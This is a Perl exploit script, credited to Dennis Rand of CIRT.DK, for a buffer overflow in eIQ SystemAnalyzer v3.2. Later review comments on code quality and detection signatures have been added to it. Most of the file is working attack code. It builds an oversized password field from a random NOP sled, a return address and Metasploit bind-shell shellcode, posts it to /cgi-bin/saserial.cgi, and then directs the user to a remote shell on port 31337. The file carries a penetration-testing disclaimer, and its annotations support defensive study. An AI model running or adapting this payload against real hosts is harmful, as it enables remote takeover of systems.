#!/usr/bin/perl #ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO # # ************************************************** !!! WARNING !!! *********************************************************** # * FOR SECURITY TESTiNG ONLY! * # ****************************************************************************************************************************** # * By using this code you agree that I makes no warranties or representations, express or implied, about the * # * accuracy, timeliness or completeness of this, including without limitations the implied warranties of * # * merchantability and fitness for a particular purpose. * # * I makes NO Warranty of non-infringement. This code may contain technical inaccuracies or typographical errors. * # * This code can never be copyrighted or owned by any commercial company, under no circumstances what so ever. * # * but can be use for as long the developer, are giving explicit approval of the usage, and the user understand * # * and approve of all the parts written in this notice. * # * This program may NOT be used by any Danish company, unless explicit written permission from the developer . * # * Neither myself nor any of my Affiliates shall be liable for any direct, incidental, consequential, indirect * # * or punitive damages arising out of access to, inability to access, or any use of the content of this code, * # * including without limitation any PC, other equipment or other property, even if I am Expressly advised of * # * the possibility of such damages. I DO NOT encourage criminal activities. If you use this code or commit * # * criminal acts with it, then you are solely responsible for your own actions and by use, downloading,transferring, * # * and/or reading anything from this code you are considered to have accepted the terms and conditions and have read * # * this disclaimer. 
# Once again this code is for penetration testing purposes only.                                                             *
# ******************************************************************************************************************************
#
# Notes:
# The more complex our security becomes, the more complex our enemy's
# efforts must be. The more we seek to shut him out, the better he must
# learn to become at breaking in. Each new level of security that we manage
# becomes no more than a stepping stone for him who would surpass us, for
# he bases his next assault upon our best defenses.
#
# Tested on :
# - Windows 2000 Server SP4, latest patch level

use IO::Socket;
use Getopt::Long;

# NOTE(review): there is no `use strict; use warnings;` in this file. $data, $bytecount,
# $error and $host below are therefore implicit package globals, and the duplicate
# `my $nopsize` in generate_random_nops() raises no "masks earlier declaration" warning.

my $host_header;                 # HTTP request headers; built only after $bytecount is known
my $target = "127.0.0.1";        # overridden by -target (string, "target=s")
my $port = "8416";               # overridden by -port (numeric, "port=i")

# Random NOP sled generator,
# The following code must be called like this: $buf .= &generate_random_nops(size);
#
# Returns a string of exactly `size` bytes, each picked at random from @nops; the
# `- 1` compensates for the inclusive 0..$nopsize range. A size of 0 (or less)
# yields the empty string. Callers in this file pass 288, 4 and 1000.
sub generate_random_nops {
    my $nopsize = shift;
    my $nopsize = ($nopsize - 1);    # re-declares the same lexical: harmless here, but a warning under `use warnings`
    # The author's substitutes for a plain 0x90 sled. "\x96" is listed twice, which only
    # skews the draw slightly. Presumably single-byte instructions -- not verified here.
    my @nops = ("\x97", "\x96", "\x95", "\x93", "\x92", "\x91", "\x96", "\x40", "\x41", "\x46", "\x4E", "\x37", "\x3F", "\x27", "\x2F");
    my $randnops = join '', map $nops[rand @nops], 0..$nopsize;    # rand @nops == rand(scalar @nops)
    return $randnops;
}

# win32_bind - EXITFUNC=seh LPORT=31337 Size=696 Encoder=Alpha2 http://metasploit.com
# Metasploit-generated bind-shell payload, kept verbatim from the author. The 31337
# listener port named above is the one attack() reports at the end; for incident
# response, an unexpected listener on TCP/31337 is the post-exploitation artefact.
my $shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x48".
"\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41\x58\x42\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x78\x69\x49\x6c\x70".
"\x6a\x6a\x4b\x30\x4d\x4d\x38\x6c\x39\x69\x6f\x69\x6f\x39\x6f\x63\x50\x6e\x6b\x50\x6c\x76\x44\x36\x44\x4e\x6b\x37\x35\x75\x6c\x6c".
"\x4b\x53\x4c\x35\x55\x30\x78\x73\x31\x4a\x4f\x6e\x6b\x30\x4f\x66\x78\x6c\x4b\x73\x6f\x61\x30\x47\x71\x38\x6b\x31\x59\x6e\x6b\x45".
"\x64\x4c\x4b\x67\x71\x7a\x4e\x76\x51\x4b\x70\x4d\x49\x6e\x4c\x6c\x44\x6f\x30\x33\x44\x37\x77\x4b\x71\x6a\x6a\x34\x4d\x75\x51\x58".
"\x42\x4a\x4b\x4b\x44\x47\x4b\x32\x74\x44\x64\x55\x78\x71\x65\x4d\x35\x4e\x6b\x71\x4f\x47\x54\x54\x41\x6a\x4b\x72\x46\x6c\x4b\x76".
"\x6c\x42\x6b\x6c\x4b\x43\x6f\x77\x6c\x57\x71\x58\x6b\x36\x63\x56\x4c\x6e\x6b\x6c\x49\x62\x4c\x51\x34\x67\x6c\x63\x51\x68\x43\x37".
"\x41\x4b\x6b\x45\x34\x4e\x6b\x73\x73\x66\x50\x6c\x4b\x67\x30\x34\x4c\x4c\x4b\x54\x30\x77\x6c\x4c\x6d\x4e\x6b\x33\x70\x76\x68\x71".
"\x4e\x53\x58\x6e\x6e\x50\x4e\x34\x4e\x38\x6c\x30\x50\x69\x6f\x6b\x66\x43\x56\x56\x33\x50\x66\x41\x78\x37\x43\x65\x62\x30\x68\x34".
"\x37\x54\x33\x37\x42\x61\x4f\x72\x74\x59\x6f\x7a\x70\x33\x58\x5a\x6b\x7a\x4d\x4b\x4c\x65\x6b\x30\x50\x4b\x4f\x4b\x66\x73\x6f\x4e".
"\x69\x4a\x45\x53\x56\x4d\x51\x6a\x4d\x67\x78\x76\x62\x56\x35\x50\x6a\x65\x52\x4b\x4f\x4a\x70\x51\x78\x79\x49\x74\x49\x7a\x55\x6e".
"\x4d\x36\x37\x6b\x4f\x38\x56\x62\x73\x62\x73\x51\x43\x70\x53\x41\x43\x70\x43\x41\x43\x30\x43\x76\x33\x79\x6f\x6e\x30\x42\x46\x71".
"\x78\x71\x6a\x52\x49\x30\x66\x32\x73\x4c\x49\x4b\x51\x4d\x45\x41\x78\x6d\x74\x36\x7a\x74\x30\x6f\x37\x30\x57\x49\x6f\x6e\x36\x52".
"\x4a\x42\x30\x63\x61\x36\x35\x6b\x4f\x6e\x30\x73\x58\x59\x34\x6e\x4d\x54\x6e\x58\x69\x31\x47\x69\x6f\x6a\x76\x61\x43\x42\x75\x69".
"\x6f\x6e\x30\x51\x78\x39\x75\x71\x59\x4b\x36\x41\x59\x42\x77\x6b\x4f\x38\x56\x50\x50\x76\x34\x33\x64\x36\x35\x6b\x4f\x6e\x30\x6d".
"\x43\x73\x58\x38\x67\x34\x39\x6f\x36\x34\x39\x53\x67\x39\x6f\x59\x46\x63\x65\x4b\x4f\x4e\x30\x30\x66\x62\x4a\x35\x34\x41\x76\x53".
"\x58\x71\x73\x50\x6d\x4d\x59\x78\x65\x63\x5a\x72\x70\x46\x39\x41\x39\x6a\x6c\x6e\x69\x6b\x57\x32\x4a\x61\x54\x4d\x59\x39\x72\x54".
"\x71\x59\x50\x68\x73\x6f\x5a\x79\x6e\x32\x62\x76\x4d\x59\x6e\x37\x32\x46\x4c\x6c\x53\x4c\x4d\x53\x4a\x75\x68\x6e\x4b\x6e\x4b\x4c".
"\x6b\x50\x68\x53\x42\x4b\x4e\x4c\x73\x54\x56\x4b\x4f\x41\x65\x70\x44\x59\x6f\x6e\x36\x63\x6b\x43\x67\x72\x72\x41\x41\x72\x71\x50".
"\x51\x62\x4a\x33\x31\x70\x51\x70\x51\x53\x65\x41\x41\x79\x6f\x38\x50\x70\x68\x4c\x6d\x4e\x39\x33\x35\x5a\x6e\x70\x53\x39\x6f\x6e".
"\x36\x42\x4a\x39\x6f\x79\x6f\x45\x67\x6b\x4f\x6e\x30\x4e\x6b\x51\x47\x4b\x4c\x6c\x43\x7a\x64\x43\x54\x4b\x4f\x6b\x66\x46\x32\x6b".
"\x4f\x5a\x70\x55\x38\x6c\x30\x4d\x5a\x57\x74\x73\x6f\x71\x43\x4b\x4f\x78\x56\x6b\x4f\x4e\x30\x48";

# Request body. For detection: a POST to /cgi-bin/saserial.cgi whose password field is
# 1996 bytes (288 + 4 + 4 + 4 + 696 + 1000, taking the author's Size=696 at face value),
# 2020 bytes in total with the 24-byte "userName=admin&password=" prefix -- far beyond
# any legitimate credential length.
$data = "userName=admin&password=";
$data .= &generate_random_nops(288);
$data .= "\x41\x41\xEB\x04"; # JMP SHORT + 4 to get past the Return Address, and letting us get to the Shellcode
$data .= "\x23\x46\x0E\x78"; # Return Address -> Using a (78 0E 46 23) CALL EBX in MSVCP60.DLL installed in the eIQ Systemanalyzer directory
$data .= &generate_random_nops(4);
$data .= "$shellcode";                 # quoting a lone scalar is a no-op; same as $data .= $shellcode;
$data .= &generate_random_nops(1000);
$bytecount = length($data); # Used for counting the bytes used in the post
# ($bytecount is interpolated into the Content-Length header when $host_header is joined below,
# so it has to be computed before that join.)

# Option parsing. Getopt::Long accepts unique prefixes by default, which is why the
# usage line's -t / -p abbreviate -target / -port. The help callback prints 90 blank
# lines to clear the screen, then the banner, and exits.
GetOptions(
    "target=s" => \$target,
    "port=i"   => \$port,
    "help|?"   => sub {
        print "\n" x 90;
        print "\t #################################################\n";
        print "\t # eIQ SystemAnalyzer v3.2 Buffer Overflow #\n";
        print "\t # ************* !!! WARNING !!! ************ #\n";
        print "\t # ****************************************** #\n";
        print "\t # (c)2006 by Dennis Rand - CIRT.DK #\n";
        print "\t #################################################\n";
        print "\n\t -target\t\t eg.: 127.0.0.1\n";
        print "\t -port\t\t\t eg.: 8416\n\n";
        print "\tUsage eg.: eIQ.pl -t 127.0.0.1 -p 8416\n";
        exit;
    }
);

# NOTE(review): both defaults above are truthy, so these checks only fire on an explicit
# `-target ""` or `-port 0`. $error is never initialised; `.=` starts from undef, which
# is silent without `use warnings`.
$error .= "Error: You must specify a target host\n" if ((!$target));
$error .= "Error: You must specify a port number\n" if ((!$port));
if ($error) { print "Try eIQ.pl -help or -?' for more information.\n$error\n" ; exit; }

# Fixed header block for the POST; Referer and Host embed the target, Content-Length
# embeds $bytecount. The trailing Cookie line carries two session-style cookies as given
# by the author.
$host_header = join ("",
    "Accept: */*\r\n",
    "Referer: http://$target:$port/default.htm\r\n",
    "Accept-Language: da\r\n",
    "Content-Type: application/x-www-form-urlencoded\r\n",
    "Accept-Encoding: gzip, deflate\r\n",
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)\r\n",
    "Host: $target:$port\r\n",
    "Content-Length: $bytecount\r\n",
    "Connection: Keep-Alive\r\n",
    "Cache-Control: no-cache\r\n",
    "Cookie: salastloggeduser=admin; saroleofuser=Administrator");

# Dispatch. $target is always true at this point (the check above exits otherwise), so
# attack() runs unconditionally. $host is assigned but never read -- attack() uses
# $target directly. attack() is defined below; Perl resolves the call at run time.
if ($target) { print "\n\n"; $host = $target; attack(); };

# attack - prints a status banner, opens one TCP connection to $target:$port, writes a
# single HTTP/1.1 POST for /cgi-bin/saserial.cgi carrying $host_header and $data as the
# body, closes the socket and exits. Takes no arguments and never returns (ends in exit).
# The print to the socket and the close are unchecked, so a connection dropped mid-write
# is not reported. The trailing `;` after the sub's closing brace is an empty statement.
sub attack {
    print "[*] Target system - eIQ SystemAnalyzer v3.2\n\n";
    print "[*] Target :\t\t\t $target\n";
    print "[*] Port :\t\t\t $port\n";
    print "[*] Shellcode Size :\t\t ".length($shellcode)." Bytes\n";
    print "[*] Total packet Size:\t\t ".length($data)." Bytes\n";
    print "[*] Connecting To Target\n";
    $| = 1;    # autoflush STDOUT so the banner appears before the socket call blocks
    my $connection = IO::Socket::INET->new(Proto =>"tcp", PeerAddr =>$target, PeerPort =>$port) || die "[*] Failed to connect to $target port $port\n";
    print $connection "POST /cgi-bin/saserial.cgi HTTP/1.1\r\n$host_header\r\n\r\n$data";
    close $connection;
    print "[*] Now Connect to remote shell on $target port 31337\r\n\r\n";
    sleep (2);
    exit;
};